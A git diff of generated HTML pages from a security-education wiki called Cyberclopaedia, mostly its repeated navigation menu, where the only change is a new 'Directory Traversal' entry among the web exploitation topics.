        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -195,22 +195,6 @@

- - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/Relocations.html b/docs/Reverse Engineering/Binary Formats/ELF/Relocations.html index f9cce5ef..d062e974 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/Relocations.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/Relocations.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -221,22 +221,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/Sections.html b/docs/Reverse Engineering/Binary Formats/ELF/Sections.html index fd962af6..0a6c01ff 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/Sections.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/Sections.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -368,22 +368,6 @@

Section Groups< - - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/Segments.html b/docs/Reverse Engineering/Binary Formats/ELF/Segments.html index 95aaf284..25f37a52 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/Segments.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/Segments.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
